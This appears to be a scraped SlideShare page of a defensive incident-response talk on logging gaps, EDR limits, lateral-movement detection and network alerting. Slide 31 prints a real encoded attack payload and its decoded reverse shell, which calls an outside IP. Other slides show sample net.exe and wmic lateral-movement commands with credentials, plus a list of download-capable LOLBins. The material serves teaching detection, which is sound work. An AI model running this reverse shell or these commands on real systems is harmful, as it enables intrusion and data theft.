Cred stealing emails bsides austin_2018 v1.0Cred stealing emails bsides austin_2018 v1.0
Cred stealing emails bsides austin_2018 v1.0
 
InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0InnoTech 2017_Defend_Against_Ransomware 3.0
InnoTech 2017_Defend_Against_Ransomware 3.0
 
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
 
Email keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malwareEmail keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned - Avoiding Ransomware and malware
 
Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.1
 
Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0Windows IR made easier and faster v1.0
Windows IR made easier and faster v1.0
 
DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1DIR ISF - Email keeps getting us pwned v1.1
DIR ISF - Email keeps getting us pwned v1.1
 
Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0Email keeps getting us pwned v1.0
Email keeps getting us pwned v1.0
 
Sandbox vs manual analysis v2.1
Sandbox vs manual analysis v2.1Sandbox vs manual analysis v2.1
Sandbox vs manual analysis v2.1
 
What can you do about ransomware
What can you do about ransomwareWhat can you do about ransomware
What can you do about ransomware
 
Mw arch mac_tips and tricks v1.0
Mw arch mac_tips and tricks v1.0Mw arch mac_tips and tricks v1.0
Mw arch mac_tips and tricks v1.0
 
Proper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoSProper logging can catch breaches like retail PoS
Proper logging can catch breaches like retail PoS
 
Logging for hackers SAINTCON
Logging for hackers SAINTCONLogging for hackers SAINTCON
Logging for hackers SAINTCON
 

Recently uploaded

Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 

Recently uploaded (20)

Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 

Incident Response Fails

  • 1. Presented by: Michael Gough Incident Response Fails What we see with our clients, and their fails
  • 2. WHOAMI 2 Public Consumption Blue Team Defender Ninja, Malware Archaeologist, Logoholic and • Principal Incident Response Engineer for I love “properly” configured logs – they tell us Who, What, Where, When and hopefully How Creator of “Windows Logging Cheat Sheet” “Windows File Auditing Cheat Sheet” “Windows Registry Auditing Cheat Sheet” “Windows Splunk Logging Cheat Sheet” “Windows ATT&CK Logging Cheat Sheet” “ARTHIR – ATT&CK Remote Threat Hunting Incident Response tool” Co-Creator of: “Log-MD” – Log Malicious Discovery Tool and “File-MD” – Static file analysis scanner
  • 3. WHOAMI 3 Public Consumption Why this talk? Learn from what we see in the trenches Avoid mistakes others make
  • 4. Being an Incident Responder 4 Public Consumption • We get called when things get • Clients want to know Who, What, Where, When, and How the pwnage happened • We all know why… • So what do we consistently see with our clients? How are they failing?
  • 5. Level Set 5 Public Consumption • Let us first define a few items • Security 101 – Things you should always do, usually things you already have and are FREE… well your time is needed • Security 201 – Things you should have to “reduce” pwnage and hopefully alert to suspicious activity • Security 301 – Things you should be doing with your tools, understand the gaps and address them with additional tooling, process and/or procedures • Security 501 – Doing things like Threat Hunting and being proactive at seeking out the malicious behavior
  • 6. This talk 6 Public Consumption • This talk covers more of Security 101 and 201 • These are the things we see many, if not most organizations are failing, forgot or did not continue doing • Organizations jump to Security 301 and forget to continue Security 101 and 201 • This is the first #Fail we see
  • 8. The 3 Cs 8 Public Consumption What do we see our clients fail at? Configuration Local audit logging not optimally configured Endpoint agents not optimally configured Coverage Endpoints missing one or more agents Some or all log data (endpoint, cloud, network, internet facing) not going to a log management solution Completeness Implement a process to validate and verify Configuration and Coverage is “Complete”
  • 9. Completeness 9 Public Consumption When you roll out an agent… Do you... 1. Validate the agent was properly installed? 2. Compare it to a list of known assets? • Do you even know where or what all your assets are? 3. Verify the data is collecting properly? 4. Have a way to identify new systems as they come live? 5. Have a way to install agents on new systems quickly? 6. Verify the endpoint configuration is showing up in the proper console(s)… regularly?
  • 10. Why the 3 C’s are important 10 Public Consumption • Incident Responders need data to discover what happened to the detail level we can be sure • This is so our clients can improve and close the gap(s) of why the pwnage happened or wasn’t detected • To reduce the cost and time of an Incident Response investigation is always a goal • It can save you 2x to 4x the cost of paying an Incident Response firm • You could be way ahead… IF you prepare
  • 11. The 3 ‘s are FREE 11 Public Consumption • You don’t have to spend $$$ to improve procedures and processes • Or tweak some settings • People time is a cost, but not an external spend • So spend some time on Preparation…. It is in the P in the SANS PICERL model • Many of our clients have incomplete or broken agent installs and endpoint configuration is not optimal • This means incomplete coverage and configuration • Thus missing details and potentially the initial compromise
  • 12. Windows Audit Logs 12 Public Consumption We check Windows systems for what logging is enabled before we perform triage to know what will likely be there… There is a freely available tool to check your Windows logs against some well known Cheat Sheets ;-) Hint..
  • 13. Local Log Sizes are NOT Big Enough 13 Public Consumption
  • 14. PowerShell Logging is inadequate 1 Public Consumption • PowerShell is used a lot in all kinds of attacks • Commodity, Ransomware, APT • Command Line details missing • ScriptBlock Logging improperly or not set
  • 15. Audit Settings Fail 15 Public Consumption • We need the data enabled and retained for a week or longer
  • 16. WHOAMI 16 Public Consumption • IF… Prevention worked so well • THEN… Why are we having more pwnage than ever before? • Can we change the term to something more realistic? • Let’s consider it “Reduction” • Now we can look at how we can reduce the likelihood, effort, time, damage, costs, etc… • Because we have not succeeded in preventing events
  • 17. Threat Hunting 17 Public Consumption • It’s all the rage • Before you can do Threat Hunting and expect to actually find anything • You need to solve the 3 C’s and have one or more methods or solutions to hunt with • Fancy EDR Threat Hunting solution • Or better yet a log management solution • That collects all the “right” things
  • 18. Threat Hunting 18 Public Consumption • Our clients want to do it • But the data is not enabled or being collected that is needed to perform any decent hunting • Same goes for performing Incident Response • You need the data or we can’t do the best job as fast as we like • Time is Money
  • 19. Client Confidential So what are we seeing out there?
  • 20. Lack of Process Details 20 Public Consumption • Why is EDR better than Anti-Virus? • For one thing it looks at the parameters and associations of an execution • The details tell us WHAT the Bad Actor(s) are actually doing • But EDR falls short on all the details as it tends to be execution based, some have comms too • But EDR alone is not enough
  • 21. Some Clients Have EDR 21 Public Consumption • Is it stopping all the attacks? • No • Does it see part of the attack? • Yes • Will I get all the details I need to investigate • Probably not, depends on the solution • Authentication monitoring is not common in EDR solutions, so lateral movement is not detected until execution of something known bad occurs
  • 22. Anti-Virus NOT Being Used Well 22 Public Consumption • We see clients with multiple AV solutions • Why is this bad? • Because getting the alert details into one place, like a Log Management solution can be a pain for many AV solutions • You need connectors to pull the data into your log management • We see Microsoft Defender alerts in the local logs, but no one is looking or collecting it
  • 23. Anti-Virus NOT Being Used Well 23 Public Consumption • If a local log is available, use it! • Collect the Defender Logs for the following Event IDs • 1006, 1009, 1116, 1117, 1119 • Only created when it finds something, so low noise, high return if you collect and alert on them • We find one or more systems see a piece of an attack in the Defender logs, but no one looked, so it was missed
  • 24. Ransomware 24 Public Consumption • Have you heard of this “new” attack? • Most are due to passwords being compromised and then logging into Internet facing systems, like RDP • Some by emailed payloads or links • Detection is very poor • Solution that detects/stops the brute login not present • Solution that detects/stops the mass encryption not present
  • 26. Login Attempts 26 Public Consumption Massive Login Attempts • From the host being investigated • We see 20, 40, 60… failed logins to an endpoint or device • No alerting for obvious places failed login attempts in mass should NOT be • Failed logins provide the source IP and sometimes name of the source attacking/attempting device • Easy alert, IF endpoint data is being collected • Most do not collect user endpoint login data • Too bad as local logins to a host for a domain user are rare
  • 27. Lateral Movement 27 Public Consumption • Lateral Movement • From the host being investigated • Bad guys use several methods, this is just one example • Net.exe, Net1.exe • You see 20 of these ‘net.exe’ in the logs, so what did they actually do? • NO Process Command Line being collected • Which means there are no details, and much more work to discover Where they went
  • 28. Lateral Movement Details 28 Public Consumption Net.exe - devil IS in the details • WHAT Server/Workstation? • WHAT Share? • WHAT User? • IF Process Command Line was being collected then you would see…. Net.exe Secret-ServerCredit-Cards /u:SuperDomainUser /p:Password123
  • 29. BIG Difference 2 Public Consumption Now if there were 20 of these events in the logs • We would now know: • What systems were connected to • What shares, thus what data was exposed and possibly taken • What user account(s) got pwned • As an Incident Responder I now have more targets to investigate because I KNOW they logged into these specific systems! • GREAT Resource by JPCert on Lateral Movement • https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
  • 30. Save Your Sanity, Time, And Job 3 Public Consumption • IF you collect the details, we can investigate in minutes/hours versus days/weeks • This equates to real $$$ saved • Since time is money • NIX and macOS ‘history’ of course we need too
  • 31. NIX Example – Barracuda Email CVE-2023-2868 3 Public Consumption • NIX and macOS ‘history’ of course we need too • --Begin Encoded Payload-- • '`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW 50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvc CI=;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`' • --End Encoded Payload-- • The encoded block above decodes to a reverse shell seen below. • --Begin Decoded Command-- • setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet - connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p" • --End Decoded Command--
  • 32. More Lateral Movement 3 Public Consumption • WMI is also used and does not log well • Look for “/user:” and /password • Remote WMI connections have a unique dual auth with Windows 10 and above, so look for these as sure fire indications of remote WMI pwnage • See my DerbyCon 2018 presentation • https://www.irongeek.com/i.php?page=videos/derbycon8/track-3-03-detecting-wmi- exploitation-michael-gough wmic /user:"FOREIGN_DOMAINAdmin" /password:"Password" /node:192.168.1.2 group list brief
  • 33. More Lateral Movement 33 Public Consumption • Windows Remote Management (WinRM) – PowerShell Remoting • So VERY Powerful • Just enable and go anywhere • This is a bit different as we need to collect a different log • Applications and Services Logs – Microsoft-Windows-Windows-Remote-Management/Operational
  • 34. More Lateral Movement 34 Public Consumption • You do need to configure the endpoint • Bad Actors use WMI to remotely execute: • winrm qc • Now PowerShell is being heavily used • Little on the Process Command Line as far as PowerShell details • What about WinRM Logs? • What about PowerShell Logs?
  • 35. WinRM Has Logs 35 Public Consumption • Event ID 6 (Host/attacker) and 91 (Target) will give you a list of systems that are connected to
  • 36. PowerShell Has Logs 36 Public Consumption • Event ID 4104 will show you the PowerShell command(s) used to connect • Enter-PSSession <hostname> … • Event ID 4103 will show you details against the Target system(s)
  • 38. Network Fails 3 Public Consumption • Outbound traffic from servers • Most have the infamous ANY/ANY outbound • No basic detection or alerts for odd ports or NEW IPs • TOR uses 80 and 443, but also others • 4443, 9001, 9030, 9040, 9050, 9051, and 9150 • What about Countries or Network Owners of the outbound IPs? • No baseline of normal traffic
  • 40. Capabilities Assessment 40 Public Consumption • In the SANS PICERL model the last item is ‘Lesson Learned’ • So apply Post-Mortem to Pre-Mortem • We call this a Capability Assessment • What is my Incident Response capability to detect an attack and respond quickly? • Am I collecting the right things? • Do I have an idea how long the data is collecting for? • Where is the data located?
  • 41. Capability Assessment 41 Public Consumption • You have to understand what data you have, how long it is collecting for and WHERE the data resides • You will need to break glass with an IR firm before this data rolls! • You need a process to evaluate this data and length you have it for • You may also need a process to collect or protect the data from rolling out of the logs
  • 42. Capability Assessment 42 Public Consumption • By doing a Capability Assessment you can determine if the log data you have is adequate for Incident Response and also Threat Hunting • You can use a well-known framework to map what you have, or should have to detect well known items used by the bad actors • You can track the progress of what you are collecting and create playbooks or runbooks as you verify your sources
  • 43. MITRE ATT&CK 43 Public Consumption • First - Everything you do should be mapped to MITRE ATT&CK - https://attack.mitre.org/ • Some of the techniques used • T1021.006 – Remote Service WinRM • T1047 – WMI • T1059.001 - Command and Scripting Interpreter: PowerShell • T1218 - Signed Binary Proxy Execution • Etc.
  • 44. Watch for Downloading LOLBin/LOLBas 44 Public Consumption • Malicious code has to be downloaded • Advanced attackers and Red Teams will use the LOLBin and Scripts LOLBaS to download the payload • Alert on these • Baseline the normal, there will NOT be many • Watch these executions closely • Process Command Line details are key!!!
  • 45. LOLBin/LOLBas That Can Be Downloaded 45 Public Consumption • powershell.exe • bitsadmin.exe • certutil.exe • psexec.exe • wmic.exe • mshta.exe • mofcomp.exe • cmstp.exe • windbg.exe • cdb.exe • msbuild.exe • csc.exe • regsvr32.exe • Excel too !!! Short list per Cisco Talos • mshta.exe • certutil.exe • bitsadmin.exe • regsvr32.exe • powershell.exe https://blog.talosintelligence.com/2019/11/hunting-for-lolbins.html Process Command Line is KEY Map to MITRE ATT&CK
  • 46. Watch Your Traffic 46 Public Consumption • It is time to setup some basic network monitoring as a part of Security 101 • Alert on ALL non 80/443 ports from internal servers • Of course 53, 22, 25, 465, 587, 1433, 3306 will be normal ports too, every org will have other ports • Look at the Network owner of the IPs and exclude the CIDR of known/trusted owners • Servers should not be overly complicated for outbound traffic IF they are not on the Internet
  • 47. Watch Your Traffic 47 Public Consumption • Of course Internet facing servers are a bit different • Create a procedure to lookup the Country and Network Owner and build a normal pattern if you can for outbound traffic • Create a way to validate IPs • We will during an event • We will process LOTS of IPs • Of course you need to enable source IP logging • AWS Flow Logs - PLEASE
  • 48. Internet Facing Systems 48 Public Consumption • How many Internet facing devices had remote vulnerabilities that got pwned in the last year or two? • It IS time to make sure the logging on Internet facing systems are collecting locally at a minimum • Know how long the data will exist or roll off • Focus on having the following data in the logs • Source IP (WHERE) • Country origin option (log mgmt. usually has this) • Authentication information (WHO)
  • 50. Conclusion 50 Public Consumption • Learn from these typical failures • Configure your logging • Cover ALL your assets • Verify the Completeness • Watch for the items in this talk • And several other of my talks Practice Security 101 and 201 even if you are all the way to 501 or beyond
  • 51. Resources 51 Public Consumption • Websites • Log-MD.com The tools • ARTHIR.com Free on GitHub • The “Windows Logging Cheat Sheet(s)” • https://MalwareArchaeology.com/cheat-sheets • MITRE ATT&CK is your friend • https://attack.mitre.org/techniques/enterprise/ • JPCert Detecting Lateral Movement • https://www.jpcert.or.jp/english/pub/sr/20170612ac- ir_research_en.pdf • This presentation and others on SlideShare • Search for MalwareArchaeology or LOG-MD
  • 52. Questions? 52 Public Consumption You can find us at: • NCCGroup.com • MalwareArchaeology.com • TIME FOR HALLWAY CON !!!